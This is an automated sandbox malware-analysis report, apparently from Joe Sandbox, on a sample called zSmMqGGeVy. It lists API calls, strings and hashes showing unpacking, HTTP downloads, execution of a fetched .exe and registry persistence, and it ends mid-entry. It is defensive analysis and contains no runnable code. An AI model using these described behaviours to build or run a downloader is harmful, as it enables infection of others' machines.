                                                  • ExitProcess.KERNEL32 ref: 0040EF48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                  • Instruction ID: d9b2d8b9480fbdfc0f40d30fbcce2ac7d268d3ffe56ae59340c1a79faed9bf6b
                                                  • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                  • Instruction Fuzzy Hash: 48E08C71400108BFCF117F26CC0898A3F28FB10341B004835F804AA232CB39DD92CB58
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00DAA486
                                                  • Module32First.KERNEL32(00000000,00000224), ref: 00DAA4A6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598451673.0000000000DA9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DA9000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_da9000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 3833638111-0
                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction ID: 6074004713fa8cedcd78a2c4db1c3535bee64b462bb66ea8d3b82e5fa0bbeede
                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction Fuzzy Hash: FCF0C2311007106BD7202ABCA88DA6E72E8AF4E324F140629F646914C0CBF4EC05CA72
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: emp$mixtwo
                                                  • API String ID: 3472027048-2390925073
                                                  • Opcode ID: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                                  • Instruction ID: 72a2dd17e89226f8ccca0b0bb08db3f26db736a0bfe45ababc36bb360cb4900e
                                                  • Opcode Fuzzy Hash: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                                  • Instruction Fuzzy Hash: 7BF08CB160130457E710BF24ED1B71A3EA4970275CFA006ADDC601F2D2E7FB821A97EA

                                                  Control-flow Graph

                                                  APIs
                                                  • Sleep.KERNEL32(000005DC,?,7732D120), ref: 00405620
                                                  • __Init_thread_footer.LIBCMT ref: 00405847
                                                  • Sleep.KERNEL32(00000BB8,00000000,?,0042B77C,0042B92C,0042B92D,?,?,?,?,?,?,?,00000001,SUB=,00000004), ref: 00405A4A
                                                    • Part of subcall function 00406550: __Init_thread_footer.LIBCMT ref: 004065B9
                                                    • Part of subcall function 004065E0: __Init_thread_footer.LIBCMT ref: 0040663A
                                                    • Part of subcall function 00407C30: __Init_thread_footer.LIBCMT ref: 00407C99
                                                    • Part of subcall function 00407BB0: __Init_thread_footer.LIBCMT ref: 00407C09
                                                    • Part of subcall function 00407B10: __Init_thread_footer.LIBCMT ref: 00407B8D
                                                  • Sleep.KERNEL32(00000BB8,00000000,?,?,?,?,?,004272E8,00000000,00000000,?,00000000,00000001,SUB=,00000004), ref: 004062DE
                                                  • Sleep.KERNEL32(00000BB8,00000000,00000000,004272E8), ref: 004063DD
                                                    • Part of subcall function 00407FA0: __Init_thread_footer.LIBCMT ref: 00407FF9
                                                    • Part of subcall function 00407F20: __Init_thread_footer.LIBCMT ref: 00407F79
                                                    • Part of subcall function 00407EC0: __Init_thread_footer.LIBCMT ref: 00407F11
                                                    • Part of subcall function 004055C0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405493
                                                    • Part of subcall function 004055C0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004054B5
                                                    • Part of subcall function 004055C0: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004054DD
                                                    • Part of subcall function 004055C0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_footer$Sleep$CloseCreateOpenValue
                                                  • String ID: DFEK$KDOX$Q)9$SUB=$]DFE$^OX*$get$mixone$updateSW$viFO
                                                  • API String ID: 2078494684-1136066708
                                                  • Opcode ID: 3370340bea71cbf09f401ea1be89ae1aa616e8b686eb8a3d9626f30ac681365a
                                                  • Instruction ID: f649a411d8851b1a91c0a488fce11130e3673d7bad0c40fe0d5f826dd2b8960c
                                                  • Opcode Fuzzy Hash: 3370340bea71cbf09f401ea1be89ae1aa616e8b686eb8a3d9626f30ac681365a
                                                  • Instruction Fuzzy Hash: 3F82AF71D001049ADB14FBB5C95ABEEB3789F14308F5081BEF412771D2EF786A49CAA9

                                                  Control-flow Graph

                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                                  • __cftof.LIBCMT ref: 10001624
                                                  • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                                  • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                                  • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                                  • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                                  • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                                  • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                                  • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                                  • String ID: GET$http://
                                                  • API String ID: 1233269984-1632879366
                                                  • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                  • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                                  • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                  • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

                                                  Control-flow Graph

                                                  APIs
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017B7
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017DD
                                                    • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 004025A3
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401803
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401829
                                                  Strings
                                                  • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401807
                                                  • text, xrefs: 00401B5C
                                                  • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401779
                                                  • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017E1
                                                  • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004017BB
                                                  • GET, xrefs: 00401F81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                                  • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text
                                                  • API String ID: 2146599340-3782612381
                                                  • Opcode ID: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                                  • Instruction ID: 9ba0ec624b0ce2a87a65cb7bdca14d25b7083be08071b54b776f69b68f7f070f
                                                  • Opcode Fuzzy Hash: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                                  • Instruction Fuzzy Hash: 34316171E00108EBDB14DFA9DC85FEEBBB9EB48714F60812AE121771C0C778A644CBA5

                                                  Control-flow Graph

                                                  • Graph not reproduced; API calls named in it: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00E9024D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID: cess$kernel32.dll
                                                  • API String ID: 4275171209-1230238691
                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction ID: 545822cb2809944e8227267bbb895ca9bc43e0c6234885531ea69000ceeeaa55
                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction Fuzzy Hash: C9526874A01229DFDB64CF98C984BA8BBB1BF09314F5480D9E94DAB351DB30AE85DF14

                                                  Control-flow Graph

                                                  • Graph not reproduced; API calls named in it: InternetSetFilePointer, InternetReadFile, HttpQueryInfoA, CoCreateInstance
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                                  • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                                  • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                                  • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                                  • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                                  • String ID: text
                                                  • API String ID: 1154000607-999008199
                                                  • Opcode ID: 5bb6c959c08c52f1deca969ff5d7f0342f658ad243dbff8a6426dbc5f8fc3103
                                                  • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                                  • Opcode Fuzzy Hash: 5bb6c959c08c52f1deca969ff5d7f0342f658ad243dbff8a6426dbc5f8fc3103
                                                  • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                                    • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: .exe$open
                                                  • API String ID: 1627157292-49952409
                                                  • Opcode ID: fecaffcc8a5dd3a535f99b20f533ad3ad145e7b685b1384be33c82bc1a84d92d
                                                  • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                                  • Opcode Fuzzy Hash: fecaffcc8a5dd3a535f99b20f533ad3ad145e7b685b1384be33c82bc1a84d92d
                                                  • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62

                                                  Control-flow Graph

                                                  APIs
                                                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009A13AD
                                                  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009A13D4
                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 009A142B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099B000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Open$InfoNativeSystem
                                                  • String ID: q8G
                                                  • API String ID: 1247124224-421552133
                                                  • Opcode ID: 3127e44c745c3bfe62092e1b7af0654af5ffaa25da2a9177e2eb2e7a390dac50
                                                  • Instruction ID: af390be659cd7a065f6d021e451f1e16c0de109d5d9845524834568700291a7a
                                                  • Opcode Fuzzy Hash: 3127e44c745c3bfe62092e1b7af0654af5ffaa25da2a9177e2eb2e7a390dac50
                                                  • Instruction Fuzzy Hash: E2519CB140820DDFEB11EF54C845BEE7BE8EF16700F11082AE981C6951D77A4CA4DF9A

                                                  Control-flow Graph

                                                  • Graph not reproduced; API calls named in it: InternetOpenA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: http://
                                                  • API String ID: 0-1121587658
                                                  • Opcode ID: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                                  • Instruction ID: beb1f9afae3dc46702148b7d116b1b3e2c798cd3d3ea86b197954d74152ad0ce
                                                  • Opcode Fuzzy Hash: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                                  • Instruction Fuzzy Hash: F451C371E002099FDB14CFA8C885BEEBBB5EF48314F20812EE915B72C1D7799945CBA4

                                                  Control-flow Graph

                                                  • Graph not reproduced; API calls named in it: RegOpenKeyA, GetNativeSystemInfo
                                                  APIs
                                                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009A13AD
                                                  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009A13D4
                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 009A142B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099B000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Open$InfoNativeSystem
                                                  • String ID:
                                                  • API String ID: 1247124224-0
                                                  • Opcode ID: 1f712ebb557d6817bb4969cdeefa09ec25fde8190f5539b27e24dfff6b464320
                                                  • Instruction ID: 1f1f24977d9f488b3bf603c6d320b77e36f51279db56f09f654e4336b10fa93e
                                                  • Opcode Fuzzy Hash: 1f712ebb557d6817bb4969cdeefa09ec25fde8190f5539b27e24dfff6b464320
                                                  • Instruction Fuzzy Hash: 70314AB150814EDFEF11DF64D848BEE3BA8EF06311F00042AEA81C6950DBB64DA4DF99

                                                  Control-flow Graph

                                                  • Graph not reproduced; API calls named in it: RegOpenKeyA, GetNativeSystemInfo
                                                  APIs
                                                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009A13AD
                                                  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009A13D4
                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 009A142B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099B000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Open$InfoNativeSystem
                                                  • String ID:
                                                  • API String ID: 1247124224-0
                                                  • Opcode ID: fc3de22f46869f494cdf149f1ae32b030c685a6104f6981cd5ccc39c61c65638
                                                  • Instruction ID: 7532480cc15b837e64dc1bdd8f00c2f221b40b21e06bcf2f4d0506f82f163a01
                                                  • Opcode Fuzzy Hash: fc3de22f46869f494cdf149f1ae32b030c685a6104f6981cd5ccc39c61c65638
                                                  • Instruction Fuzzy Hash: 67215A7150414E9EEF21DFA0C848BEF3BACEF0A351F400426EA81C6911DBB64DA4DF99

                                                  Control-flow Graph

                                                  • Graph not reproduced; API calls named in it: CreateFileA, WriteFile, CloseHandle
                                                  APIs
                                                  • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004020F6
                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402117
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040211E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleWrite
                                                  • String ID:
                                                  • API String ID: 1065093856-0
                                                  • Opcode ID: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
                                                  • Instruction ID: 54406537bc71ee86772d4e0f102f4040d02d69394e2def86726d8d124470bd26
                                                  • Opcode Fuzzy Hash: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
                                                  • Instruction Fuzzy Hash: 4401D671610204ABD720DF68DD49FEEB7A8EB48725F00053EFA45AA2D0DAB46945C758
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000400,?,?,00E90223,?,?), ref: 00E90E19
                                                  • SetErrorMode.KERNEL32(00000000,?,?,00E90223,?,?), ref: 00E90E1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction ID: 0f6dc757821242bf246160c9719ebb01f3cfc829a44d2ab6c915127284933777
                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction Fuzzy Hash: 4ED0123514512877DB002A94DC09BCD7B1CDF05B66F408411FB0DE9080C770994046E5
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099B000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 5f478d6f1dfec56bdfd8c41c797b8034519cab6cca5dec901336be7ca60d7b90
                                                  • Instruction ID: f9ec1002ceaddf0a58970e562179875d42c356cae58bedc1571fe76b4886eaff
                                                  • Opcode Fuzzy Hash: 5f478d6f1dfec56bdfd8c41c797b8034519cab6cca5dec901336be7ca60d7b90
                                                  • Instruction Fuzzy Hash: E92138B140DA00DFD304BF29D58557ABBE0EF45710F268D2DE9CA87250D6398A919B87
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,?), ref: 00A71BF0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099B000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: 85bdd5a397a0a194f057cf662d50fb945105e8c4c0dacb4e84a669905b16ad68
                                                  • Instruction ID: 72f2ec000bdfb27a9ec3a9215ed37f16a0277da476f1e4d9122e59be3ee3a743
                                                  • Opcode Fuzzy Hash: 85bdd5a397a0a194f057cf662d50fb945105e8c4c0dacb4e84a669905b16ad68
                                                  • Instruction Fuzzy Hash: F6F0B4B115824CEEE7249F5C8C8AFFB37F8DB00711F58C019B64A899C1F6A16D149F6A
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                                  • Instruction ID: ad8272dea5af250e00f6a395d7f300feb0e2b911a381963764dc482fc342fffd
                                                  • Opcode Fuzzy Hash: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                                  • Instruction Fuzzy Hash: B4E03031205225AAD73126A69E00BDB3A589B417A4F154233EC04E66D1DBAC9CE182AD
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                  • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                                  • Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                  • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                                  APIs
                                                  • VirtualProtect.KERNEL32(?), ref: 00A92E91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000A92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A92000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a92000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b1bb3170cdd3b3b7e9b4ca1deb2ba2477b74081c4fdbbab59794a4f8b52866f6
                                                  • Instruction ID: 7c2e343f1b5bf5d46fe4c03b33de66a518670460b4edbce007a12b827fa41a56
                                                  • Opcode Fuzzy Hash: b1bb3170cdd3b3b7e9b4ca1deb2ba2477b74081c4fdbbab59794a4f8b52866f6
                                                  • Instruction Fuzzy Hash: 2FF08C3264510EEFCB14CF25C981BDEBBA6FF90750F24801AE84197E64C7B66D218F48
                                                  APIs
                                                  • VirtualProtect.KERNEL32(?), ref: 00A92E91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000A92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A92000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a92000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: c59b2d0b83b12de316770ed8b9581ea0d51ace4a58cf25cd7806cb15108c5049
                                                  • Instruction ID: e42d706e8158039aed7543a4679fd14072b68e9e789745bae1a7dd9e833729d9
                                                  • Opcode Fuzzy Hash: c59b2d0b83b12de316770ed8b9581ea0d51ace4a58cf25cd7806cb15108c5049
                                                  • Instruction Fuzzy Hash: C1F0393264410FABDB04CF15C951BDEB7A2EFE5B10F24811AE84497E54C7BA6D218F48
                                                  APIs
                                                  • _free.LIBCMT ref: 0040E27B
                                                    • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                    • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast_free
                                                  • String ID:
                                                  • API String ID: 1353095263-0
                                                  • Opcode ID: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
